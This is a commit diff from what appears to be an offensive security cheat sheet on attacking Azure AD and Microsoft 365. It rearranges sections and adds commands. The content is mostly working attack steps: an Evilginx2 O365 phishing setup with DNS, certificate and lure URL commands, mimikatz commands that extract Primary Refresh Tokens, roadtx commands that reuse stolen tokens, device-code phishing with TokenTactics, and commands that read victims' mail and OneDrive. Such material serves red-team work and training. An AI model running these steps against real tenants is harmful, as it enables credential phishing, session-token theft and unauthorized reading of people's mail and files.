Evilginx Phishlet
parent
23b16ca0de
commit
4947154dc7
|
@ -16,7 +16,6 @@
|
|||
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
|
||||
* [Enumerate manually](#enumerate-manually)
|
||||
* [Enumeration methodology](#enumeration-methodology)
|
||||
* [Phishing with Evilginx2](#phishing-with-evilginx2)
|
||||
* [Token from Managed Identity](#token-from-managed-identity)
|
||||
* [Azure API via Powershell](#azure-api-via-powershell)
|
||||
* [Azure API via Python Version](#azure-api-via-python-version)
|
||||
|
@ -439,28 +438,6 @@ PS Az> Get-AzStorageAccount | fl
|
|||
PS Az> Get-AzKeyVault
|
||||
```
|
||||
|
||||
## Phishing with Evilginx2
|
||||
|
||||
```powershell
|
||||
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
||||
: config domain username.corp
|
||||
: config ip 10.10.10.10
|
||||
: phishlets hostname o365 login.username.corp
|
||||
: phishlets get-hosts o365
|
||||
|
||||
Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine
|
||||
|
||||
# copy certificate and enable the phishing
|
||||
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
|
||||
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
|
||||
: phishlets enable o365
|
||||
|
||||
# get the phishing URL
|
||||
: lures create o365
|
||||
: lures get-url 0
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Token from Managed Identity
|
||||
|
||||
|
|
|
@ -91,13 +91,15 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
|
|||
|
||||
* Use PRT token
|
||||
```ps1
|
||||
roadtx browserprtauth -prt roadtx.prt -url http://www.office.com
|
||||
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <session-key>
|
||||
roadtx browserprtauth --prt roadtx.prt -url http://www.office.com
|
||||
```
|
||||
|
||||
|
||||
### Extract PRT v1
|
||||
|
||||
```ps1
|
||||
mimikatz # token::elevate
|
||||
mimikatz # sekurlsa::cloudap
|
||||
mimikatz # sekurlsa::dpapi
|
||||
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
|
||||
|
@ -110,7 +112,7 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
|
|||
* No method known to date.
|
||||
|
||||
|
||||
### Generate a PRT by registering a device
|
||||
### Upgrade Refresh Token to PRT
|
||||
|
||||
```ps1
|
||||
# Get correct token audience
|
||||
|
|
|
@ -45,4 +45,15 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
|
|||
```
|
||||
|
||||
|
||||
# Service Principals
|
||||
# Service Principals
|
||||
|
||||
|
||||
|
||||
# Other
|
||||
|
||||
Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
|
||||
|
||||
```ps1
|
||||
roadtx getscope -s https://graph.microsoft.com/mail.read
|
||||
roadtx findscope -s https://graph.microsoft.com/mail.read
|
||||
```
|
||||
|
|
|
@ -97,4 +97,27 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
|
|||
* Replace `<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft)
|
||||
* Leave TokenTactics running in the PowerShell window and send the phishing email
|
||||
* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
|
||||
* Enjoy your **access token** and **refresh token**
|
||||
* Enjoy your **access token** and **refresh token**
|
||||
|
||||
|
||||
## Phishing with Evilginx2
|
||||
|
||||
* Run `evilginx2` with o365 phishlet
|
||||
```powershell
|
||||
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
||||
: config domain username.corp
|
||||
: config ip 10.10.10.10
|
||||
: phishlets hostname o365 login.username.corp
|
||||
: phishlets get-hosts o365
|
||||
```
|
||||
* Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine
|
||||
* Copy certificate and enable the phishing
|
||||
```ps1
|
||||
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
|
||||
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
|
||||
: phishlets enable o365
|
||||
|
||||
# get the phishing URL
|
||||
: lures create o365
|
||||
: lures get-url 0
|
||||
```
|
||||
|
|
|
@ -50,7 +50,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
|
|||
```
|
||||
|
||||
|
||||
## Outlook Mails
|
||||
### Outlook Mails
|
||||
|
||||
* Read user mails
|
||||
```ps1
|
||||
|
@ -58,7 +58,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
|
|||
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
|
||||
```
|
||||
|
||||
## OneDrive Files
|
||||
### OneDrive Files
|
||||
|
||||
```ps1
|
||||
$userId = "<user-id>"
|
||||
|
|
Loading…
Reference in New Issue